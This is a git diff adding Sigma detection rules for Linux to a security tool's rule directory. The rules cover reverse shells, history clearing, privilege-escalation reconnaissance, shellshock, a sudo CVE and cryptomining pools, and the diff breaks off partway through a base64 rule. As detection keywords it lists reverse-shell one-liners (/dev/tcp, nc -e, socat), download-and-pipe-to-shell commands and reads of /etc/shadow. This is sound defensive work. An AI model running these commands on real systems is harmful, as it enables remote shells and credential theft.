+references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1166/T1166.md + - https://attack.mitre.org/techniques/T1166/ +date: 2020/06/16 +modified: 2021/11/27 +logsource: + product: linux +detection: + selection1: + - '*chown root*' + selection2: + - '* chmod u+s*' + selection3: + - '* chmod g+s*' + condition: (selection1 and selection2) or (selection1 and selection3) +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.persistence diff --git a/bin/main/rules/linux/builtin/lnx_shell_clear_cmd_history.yml b/bin/main/rules/linux/builtin/lnx_shell_clear_cmd_history.yml new file mode 100644 index 000000000..de06373a9 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_shell_clear_cmd_history.yml @@ -0,0 +1,43 @@ +title: Clear Command History +id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e +status: experimental +description: Clear command history in linux which is used for defense evasion. + # Example config for this one (place it in .bash_profile): + # (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) & + # It monitors the size of .bash_history and log the words "empty_bash_history" whenever a previously not empty bash_history becomes empty + # We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example) + # It has two advantages over the version suggested by Patrick Bareiss : + # - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities ! + # - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected +author: Patrick Bareiss +date: 2019/03/24 +modified: 2021/11/24 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md + - https://attack.mitre.org/techniques/T1070/003/ + - https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics +logsource: + product: linux +detection: + keywords: + - 'rm *bash_history' + - 'echo "" > *bash_history' + - 'cat /dev/null > *bash_history' + - 'cat /dev/zero > *bash_history' + - 'ln -sf /dev/null *bash_history' + - 'ln -sf /dev/zero *bash_history' + - 'truncate -s0 *bash_history' + # - 'unset HISTFILE' # prone to false positives + - 'export HISTFILESIZE=0' + - 'history -c' + - 'history -w' + - 'shred *bash_history' + - 'empty_bash_history' + - 'chattr +i *bash_history' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1070.003 diff --git a/bin/main/rules/linux/builtin/lnx_shell_priv_esc_prep.yml b/bin/main/rules/linux/builtin/lnx_shell_priv_esc_prep.yml new file mode 100644 index 000000000..d447ec8de --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_shell_priv_esc_prep.yml @@ -0,0 +1,71 @@ +title: Privilege Escalation Preparation +id: 444ade84-c362-4260-b1f3-e45e20e1a905 +status: test +description: Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. +author: Patrick Bareiss +references: + - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ + - https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/ +date: 2019/04/05 +modified: 2021/11/27 +logsource: + product: linux +detection: + keywords: + # distribution type and kernel version + - 'cat /etc/issue' + - 'cat /etc/*-release' + - 'cat /proc/version' + - 'uname -a' + - 'uname -mrs' + - 'rpm -q kernel' + - 'dmesg | grep Linux' + - 'ls /boot | grep vmlinuz-' + # environment variables + - 'cat /etc/profile' + - 'cat /etc/bashrc' + - 'cat ~/.bash_profile' + - 'cat ~/.bashrc' + - 'cat ~/.bash_logout' + # applications and services as root + - 'ps -aux | grep root' + - 'ps -ef | grep root' + # scheduled tasks + - 'crontab -l' + - 'cat /etc/cron*' + - 'cat /etc/cron.allow' + - 'cat /etc/cron.deny' + - 'cat /etc/crontab' + # search for plain text user/passwords + - 'grep -i user *' + - 'grep -i pass *' + # networking + - 'ifconfig' + - 'cat /etc/network/interfaces' + - 'cat /etc/sysconfig/network' + - 'cat /etc/resolv.conf' + - 'cat /etc/networks' + - 'iptables -L' + - 'lsof -i' + - 'netstat -antup' + - 'netstat -antpx' + - 'netstat -tulpn' + - 'arp -e' + - 'route' + # sensitive files + - 'cat /etc/passwd' + - 'cat /etc/group' + - 'cat /etc/shadow' + # sticky bits + - 'find / -perm -u=s' + - 'find / -perm -g=s' + - 'find / -perm -4000' + - 'find / -perm -2000' + timeframe: 30m + condition: keywords +falsepositives: + - Troubleshooting on Linux Machines +level: medium +tags: + - attack.execution + - attack.t1059.004 diff --git a/bin/main/rules/linux/builtin/lnx_shell_susp_commands.yml b/bin/main/rules/linux/builtin/lnx_shell_susp_commands.yml new file mode 100644 index 000000000..4c8a64463 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_shell_susp_commands.yml @@ -0,0 +1,59 @@ +title: Suspicious Activity in Shell Commands +id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 +status: test +description: Detects suspicious shell commands used in various exploit codes (see references) +author: Florian Roth +references: + - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb#L121 + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ +date: 2017/08/21 +modified: 2021/11/27 +logsource: + product: linux +detection: + keywords: + # Generic suspicious commands + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' + # Malware + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' + # Apache Struts in-the-wild exploit codes + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' + # Metasploit framework exploit codes + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.execution + - attack.t1059.004 diff --git a/bin/main/rules/linux/builtin/lnx_shell_susp_log_entries.yml b/bin/main/rules/linux/builtin/lnx_shell_susp_log_entries.yml new file mode 100644 index 000000000..7501d26ed --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_shell_susp_log_entries.yml @@ -0,0 +1,21 @@ +title: Suspicious Log Entries +id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 +status: test +description: Detects suspicious log entries in Linux log files +author: Florian Roth +date: 2017/03/25 +modified: 2021/11/27 +logsource: + product: linux +detection: + keywords: + - entered promiscuous mode + - Deactivating service + - Oversized packet received from + - imuxsock begins to drop messages + condition: keywords +falsepositives: + - Unknown +level: medium +tags: + - attack.impact diff --git a/bin/main/rules/linux/builtin/lnx_shell_susp_rev_shells.yml b/bin/main/rules/linux/builtin/lnx_shell_susp_rev_shells.yml new file mode 100644 index 000000000..e8fe87ee7 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_shell_susp_rev_shells.yml @@ -0,0 +1,45 @@ +title: Suspicious Reverse Shell Command Line +id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab +status: test +description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell +author: Florian Roth +references: + - https://alamot.github.io/reverse_shells/ +date: 2019/04/02 +modified: 2021/11/27 +logsource: + product: linux +detection: + keywords: + - 'BEGIN {s = "/inet/tcp/0/' + - 'bash -i >& /dev/tcp/' + - 'bash -i >& /dev/udp/' + - 'sh -i >$ /dev/udp/' + - 'sh -i >$ /dev/tcp/' + - '&& while read line 0<&5; do' + - '/bin/bash -c exec 5<>/dev/tcp/' + - '/bin/bash -c exec 5<>/dev/udp/' + - 'nc -e /bin/sh ' + - '/bin/sh | nc' + - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' + - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' + - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + - '/bin/sh -i <&3 >&3 2>&3' + - 'uname -a; w; id; /bin/bash -i' + - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' + - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' + - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' + - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' + - 'rm -f /tmp/p; mknod /tmp/p p &&' + - ' | /bin/bash | telnet ' + - ',echo=0,raw tcp-listen:' + - 'nc -lvvp ' + - 'xterm -display 1' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.execution + - attack.t1059.004 diff --git a/bin/main/rules/linux/builtin/lnx_shellshock.yml b/bin/main/rules/linux/builtin/lnx_shellshock.yml new file mode 100644 index 000000000..13ed22033 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_shellshock.yml @@ -0,0 +1,24 @@ +title: Shellshock Expression +id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e +status: experimental +description: Detects shellshock expressions in log files +author: Florian Roth +date: 2017/03/14 +modified: 2021/04/28 +references: + - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf +logsource: + product: linux +detection: + keywords: + - '(){:;};' + - '() {:;};' + - '() { :;};' + - '() { :; };' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.persistence + - attack.t1505.003 diff --git a/bin/main/rules/linux/builtin/lnx_space_after_filename_.yml b/bin/main/rules/linux/builtin/lnx_space_after_filename_.yml new file mode 100644 index 000000000..c963868b7 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_space_after_filename_.yml @@ -0,0 +1,22 @@ +title: Space After Filename +id: 879c3015-c88b-4782-93d7-07adf92dbcb7 +status: test +description: Detects space after filename +author: Ömer Günal +references: + - https://attack.mitre.org/techniques/T1064 +date: 2020/06/17 +modified: 2021/11/27 +logsource: + product: linux +detection: + selection1: + - 'echo "*" > * && chmod +x *' + selection2: + - 'mv * "* "' + condition: selection1 and selection2 +falsepositives: + - Typos +level: low +tags: + - attack.execution diff --git a/bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml b/bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml new file mode 100644 index 000000000..bc4c3da22 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml @@ -0,0 +1,25 @@ +title: Sudo Privilege Escalation CVE-2019-14287 +id: f74107df-b6c6-4e80-bf00-4170b658162b +status: experimental +description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +author: Florian Roth +date: 2019/10/15 +modified: 2021/09/14 +references: + - https://www.openwall.com/lists/oss-security/2019/10/14/1 + - https://access.redhat.com/security/cve/cve-2019-14287 + - https://twitter.com/matthieugarin/status/1183970598210412546 +logsource: + product: linux +tags: + - attack.privilege_escalation + - attack.t1068 + - attack.t1548.003 + - cve.2019.14287 +detection: + selection_keywords: + - '* -u#*' + condition: selection_keywords +falsepositives: + - Unlikely +level: high diff --git a/bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml b/bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml new file mode 100644 index 000000000..d95240e1b --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml @@ -0,0 +1,31 @@ +title: Sudo Privilege Escalation CVE-2019-14287 +id: 7fcc54cb-f27d-4684-84b7-436af096f858 +related: + - id: f74107df-b6c6-4e80-bf00-4170b658162b + type: derived +status: experimental +description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 +author: Florian Roth +date: 2019/10/15 +modified: 2021/11/11 +references: + - https://www.openwall.com/lists/oss-security/2019/10/14/1 + - https://access.redhat.com/security/cve/cve-2019-14287 + - https://twitter.com/matthieugarin/status/1183970598210412546 +logsource: + product: linux + service: sudo +tags: + - attack.privilege_escalation + - attack.t1068 + - attack.t1548.003 + - cve.2019.14287 +detection: + selection_user: + USER: + - '#-*' + - '#*4294967295' + condition: selection_user +falsepositives: + - Unlikely +level: critical diff --git a/bin/main/rules/linux/builtin/lnx_susp_dev_tcp.yml b/bin/main/rules/linux/builtin/lnx_susp_dev_tcp.yml new file mode 100644 index 000000000..3c9b00d8c --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_susp_dev_tcp.yml @@ -0,0 +1,31 @@ +title: Suspicious Use of /dev/tcp +id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c +status: experimental +description: Detects suspicious command with /dev/tcp +author: frack113 +references: + - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ + - https://book.hacktricks.xyz/shells/shells/linux + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan +date: 2021/12/10 +modified: 2022/01/10 +logsource: + product: linux +detection: + keyword: + - 'cat /dev/tcp/' + - 'echo >/dev/tcp/' + - 'bash -i >& /dev/tcp/' + - 'sh -i >& /dev/udp/' + - '0<&196;exec 196<>/dev/tcp/' + - 'exec 5<>/dev/tcp/' + - '(sh)0>/dev/tcp/' + - 'bash -c ''bash -i >& /dev/tcp/' + - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' + condition: 1 of keyword +falsepositives: + - Unknown +level: medium +tags: + - attack.reconnaissance diff --git a/bin/main/rules/linux/builtin/lnx_susp_jexboss.yml b/bin/main/rules/linux/builtin/lnx_susp_jexboss.yml new file mode 100644 index 000000000..118ed0cd3 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_susp_jexboss.yml @@ -0,0 +1,23 @@ +title: JexBoss Command Sequence +id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae +status: test +description: Detects suspicious command sequence that JexBoss +author: Florian Roth +references: + - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A +date: 2017/08/24 +modified: 2021/11/27 +logsource: + product: linux +detection: + selection1: + - 'bash -c /bin/bash' + selection2: + - '&/dev/tcp/' + condition: selection1 and selection2 +falsepositives: + - Unknown +level: high +tags: + - attack.execution + - attack.t1059.004 diff --git a/bin/main/rules/linux/builtin/lnx_symlink_etc_passwd.yml b/bin/main/rules/linux/builtin/lnx_symlink_etc_passwd.yml new file mode 100644 index 000000000..4e26563e6 --- /dev/null +++ b/bin/main/rules/linux/builtin/lnx_symlink_etc_passwd.yml @@ -0,0 +1,22 @@ +title: Symlink Etc Passwd +id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523 +status: test +description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd +author: Florian Roth +references: + - https://www.qualys.com/2021/05/04/21nails/21nails.txt +date: 2019/04/05 +modified: 2021/11/27 +logsource: + product: linux +detection: + keywords: + - 'ln -s -f /etc/passwd' + - 'ln -s /etc/passwd' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.t1204.001 + - attack.execution diff --git a/bin/main/rules/linux/file_create/file_create_lnx_cron_files.yml b/bin/main/rules/linux/file_create/file_create_lnx_cron_files.yml new file mode 100644 index 000000000..03ac93263 --- /dev/null +++ b/bin/main/rules/linux/file_create/file_create_lnx_cron_files.yml @@ -0,0 +1,32 @@ +title: Cron Files +id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 +status: experimental +description: Detects creation of cron files or files in Cron directories. Potential persistence. +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.persistence + - attack.t1053.003 +references: + - https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml +logsource: + product: linux + category: file_create +detection: + selection1: + TargetFilename|startswith: + - '/etc/cron.d/' + - '/etc/cron.daily/' + - '/etc/cron.hourly/' + - '/etc/cron.monthly/' + - '/etc/cron.weekly/' + - '/var/spool/cron/crontabs/' + selection2: + TargetFilename|contains: + - '/etc/cron.allow' + - '/etc/cron.deny' + - '/etc/crontab' + condition: selection1 or selection2 +falsepositives: + - Any legitimate cron file. +level: medium diff --git a/bin/main/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml b/bin/main/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml new file mode 100644 index 000000000..11c4e0635 --- /dev/null +++ b/bin/main/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml @@ -0,0 +1,22 @@ +title: Linux Doas Conf File Creation +id: 00eee2a5-fdb0-4746-a21d-e43fbdea5681 +status: stable +description: Detects the creation of doas.conf file in linux host platform. +references: + - https://research.splunk.com/endpoint/linux_doas_conf_file_creation/ + - https://www.makeuseof.com/how-to-install-and-use-doas/ +author: Sittikorn S, Teoderick Contreras +date: 2022/01/20 +tags: + - attack.privilege_escalation + - attack.t1548 +logsource: + product: linux + category: file_create +detection: + selection: + TargetFilename|endswith: '/etc/doas.conf' + condition: selection +falsepositives: + - Unlikely +level: medium diff --git a/bin/main/rules/linux/modsecurity/modsec_mulitple_blocks.yml b/bin/main/rules/linux/modsecurity/modsec_mulitple_blocks.yml new file mode 100644 index 000000000..b086a3a68 --- /dev/null +++ b/bin/main/rules/linux/modsecurity/modsec_mulitple_blocks.yml @@ -0,0 +1,23 @@ +title: Multiple Modsecurity Blocks +id: a06eea10-d932-4aa6-8ba9-186df72c8d23 +status: stable +description: Detects multiple blocks by the mod_security module (Web Application Firewall) +author: Florian Roth +date: 2017/02/28 +logsource: + product: linux + service: modsecurity +detection: + selection: + - 'mod_security: Access denied' + - 'ModSecurity: Access denied' + - 'mod_security-message: Access denied' + timeframe: 120m + condition: selection +falsepositives: + - Vulnerability scanners + - Frequent attacks if system faces Internet +level: medium +tags: + - attack.impact + - attack.t1499 diff --git a/bin/main/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/bin/main/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml new file mode 100644 index 000000000..cda154205 --- /dev/null +++ b/bin/main/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml @@ -0,0 +1,22 @@ +title: Linux Reverse Shell Indicator +id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 +status: experimental +description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') +references: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +date: 2021/10/16 +author: Florian Roth +logsource: + product: linux + category: network_connection +detection: + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml b/bin/main/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml new file mode 100644 index 000000000..33aff0f73 --- /dev/null +++ b/bin/main/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml @@ -0,0 +1,40 @@ +title: Linux Crypto Mining Pool Connections +id: a46c93b7-55ed-4d27-a41b-c259456c4746 +status: stable +description: Detects process connections to a Monero crypto mining pool +references: + - https://www.poolwatch.io/coin/monero +date: 2021/10/26 +author: Florian Roth +logsource: + product: linux + category: network_connection +detection: + selection: + DestinationHostname: + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' + - 'moneroocean.stream' + - 'monerocean.stream' + condition: selection +falsepositives: + - Legitimate use of crypto miners +level: high diff --git a/bin/main/rules/linux/other/lnx_clamav.yml b/bin/main/rules/linux/other/lnx_clamav.yml new file mode 100644 index 000000000..a4f6cec6e --- /dev/null +++ b/bin/main/rules/linux/other/lnx_clamav.yml @@ -0,0 +1,25 @@ +title: Relevant ClamAV Message +id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb +status: stable +description: Detects relevant ClamAV messages +author: Florian Roth +date: 2017/03/01 +references: + - https://github.com/ossec/ossec-hids/blob/master/etc/rules/clam_av_rules.xml +logsource: + product: linux + service: clamav +detection: + keywords: + - 'Trojan*FOUND' + - 'VirTool*FOUND' + - 'Webshell*FOUND' + - 'Rootkit*FOUND' + - 'Htran*FOUND' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.resource_development + - attack.t1588.001 diff --git a/bin/main/rules/linux/other/lnx_security_tools_disabling_syslog.yml b/bin/main/rules/linux/other/lnx_security_tools_disabling_syslog.yml new file mode 100644 index 000000000..096ab0368 --- /dev/null +++ b/bin/main/rules/linux/other/lnx_security_tools_disabling_syslog.yml @@ -0,0 +1,29 @@ +title: Disabling Security Tools +id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 +related: + - id: e3a8a052-111f-4606-9aee-f28ebeb76776 + type: derived +status: experimental +description: Detects disabling security tools +author: Ömer Günal, Alejandro Ortuno, oscd.community +date: 2020/06/17 +modified: 2021/09/14 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: linux + service: syslog +detection: + keywords: + - '*stopping iptables*' + - '*stopping ip6tables*' + - '*stopping firewalld*' + - '*stopping cbdaemon*' + - '*stopping falcon-sensor*' + condition: keywords +falsepositives: + - Legitimate administration activities +level: medium diff --git a/bin/main/rules/linux/other/lnx_ssh_cve_2018_15473.yml b/bin/main/rules/linux/other/lnx_ssh_cve_2018_15473.yml new file mode 100644 index 000000000..4b422fb7c --- /dev/null +++ b/bin/main/rules/linux/other/lnx_ssh_cve_2018_15473.yml @@ -0,0 +1,22 @@ +title: SSHD Error Message CVE-2018-15473 +id: 4c9d903d-4939-4094-ade0-3cb748f4d7da +status: test +description: Detects exploitation attempt using public exploit code for CVE-2018-15473 +author: Florian Roth +references: + - https://github.com/Rhynorater/CVE-2018-15473-Exploit +date: 2017/08/24 +modified: 2021/11/27 +logsource: + product: linux + service: sshd +detection: + keywords: + - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]' + condition: keywords +falsepositives: + - Unknown +level: medium +tags: + - attack.reconnaissance + - attack.t1589 diff --git a/bin/main/rules/linux/other/lnx_susp_failed_logons_single_source.yml b/bin/main/rules/linux/other/lnx_susp_failed_logons_single_source.yml new file mode 100644 index 000000000..1f13b201c --- /dev/null +++ b/bin/main/rules/linux/other/lnx_susp_failed_logons_single_source.yml @@ -0,0 +1,25 @@ +title: Failed Logins with Different Accounts from Single Source System +id: fc947f8e-ea81-4b14-9a7b-13f888f94e18 +status: test +description: Detects suspicious failed logins with different user accounts from a single source system +author: Florian Roth +date: 2017/02/16 +modified: 2021/11/27 +logsource: + product: linux + service: auth +detection: + selection: + pam_message: authentication failure + pam_user: '*' + pam_rhost: '*' + timeframe: 24h + condition: selection +falsepositives: + - Terminal servers + - Jump servers + - Workstations with frequently changing users +level: medium +tags: + - attack.credential_access + - attack.t1110 diff --git a/bin/main/rules/linux/other/lnx_susp_guacamole.yml b/bin/main/rules/linux/other/lnx_susp_guacamole.yml new file mode 100644 index 000000000..9de7add4c --- /dev/null +++ b/bin/main/rules/linux/other/lnx_susp_guacamole.yml @@ -0,0 +1,22 @@ +title: Guacamole Two Users Sharing Session Anomaly +id: 1edd77db-0669-4fef-9598-165bda82826d +status: test +description: Detects suspicious session with two users present +author: Florian Roth +references: + - https://research.checkpoint.com/2020/apache-guacamole-rce/ +date: 2020/07/03 +modified: 2021/11/27 +logsource: + product: linux + service: guacamole +detection: + selection: + - '(2 users now present)' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1212 diff --git a/bin/main/rules/linux/other/lnx_susp_named.yml b/bin/main/rules/linux/other/lnx_susp_named.yml new file mode 100644 index 000000000..6c7a43e2f --- /dev/null +++ b/bin/main/rules/linux/other/lnx_susp_named.yml @@ -0,0 +1,24 @@ +title: Suspicious Named Error +id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365 +status: test +description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts +author: Florian Roth +references: + - https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml +date: 2018/02/20 +modified: 2021/11/27 +logsource: + product: linux + service: syslog +detection: + keywords: + - '* dropping source port zero packet from *' + - '* denied AXFR from *' + - '* exiting (due to fatal error)*' + condition: keywords +falsepositives: + - Unknown +level: high +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/linux/other/lnx_susp_ssh.yml b/bin/main/rules/linux/other/lnx_susp_ssh.yml new file mode 100644 index 000000000..dbf3e58fe --- /dev/null +++ b/bin/main/rules/linux/other/lnx_susp_ssh.yml @@ -0,0 +1,33 @@ +title: Suspicious OpenSSH Daemon Error +id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc +status: test +description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts +author: Florian Roth +references: + - https://github.com/openssh/openssh-portable/blob/master/ssherr.c + - https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml +date: 2017/06/30 +modified: 2021/11/27 +logsource: + product: linux + service: sshd +detection: + keywords: + - '*unexpected internal error*' + - '*unknown or unsupported key type*' + - '*invalid certificate signing key*' + - '*invalid elliptic curve value*' + - '*incorrect signature*' + - '*error in libcrypto*' + - '*unexpected bytes remain after decoding*' + - '*fatal: buffer_get_string: bad string*' + - '*Local: crc32 compensation attack*' + - '*bad client public DH value*' + - '*Corrupted MAC on input*' + condition: keywords +falsepositives: + - Unknown +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/linux/other/lnx_susp_vsftp.yml b/bin/main/rules/linux/other/lnx_susp_vsftp.yml new file mode 100644 index 000000000..9109c095c --- /dev/null +++ b/bin/main/rules/linux/other/lnx_susp_vsftp.yml @@ -0,0 +1,38 @@ +title: Suspicious VSFTPD Error Messages +id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe +status: test +description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts +author: Florian Roth +references: + - https://github.com/dagwieers/vsftpd/ +date: 2017/07/05 +modified: 2021/11/27 +logsource: + product: linux + service: vsftpd +detection: + keywords: + - 'Connection refused: too many sessions for this address.' + - 'Connection refused: tcp_wrappers denial.' + - 'Bad HTTP verb.' + - 'port and pasv both active' + - 'pasv and port both active' + - 'Transfer done (but failed to open directory).' + - 'Could not set file modification time.' + - 'bug: pid active in ptrace_sandbox_free' + - 'PTRACE_SETOPTIONS failure' + - 'weird status:' + - 'couldn''t handle sandbox event' + - 'syscall * out of bounds' + - 'syscall not permitted:' + - 'syscall validate failed:' + - 'Input line too long.' + - 'poor buffer accounting in str_netfd_alloc' + - 'vsf_sysutil_read_loop' + condition: keywords +falsepositives: + - Unknown +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_at_command.yml new file mode 100644 index 000000000..9682052eb --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_at_command.yml @@ -0,0 +1,23 @@ +title: Scheduled Task/Job At +id: d2d642d7-b393-43fe-bae4-e81ed5915c4b +status: stable +description: Detects the use of at/atd +author: Ömer Günal, oscd.community +date: 2020/10/06 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: + - '/at' + - '/atd' + condition: selection +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.persistence + - attack.t1053.002 diff --git a/bin/main/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/bin/main/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml new file mode 100644 index 000000000..06fa3d0a0 --- /dev/null +++ b/bin/main/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml @@ -0,0 +1,23 @@ +title: Decode Base64 Encoded Text +id: e2072cab-8c9a-459b-b63c-40ae79e27031 +status: test +description: Detects usage of base64 utility to decode arbitrary base64-encoded text +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/base64' + 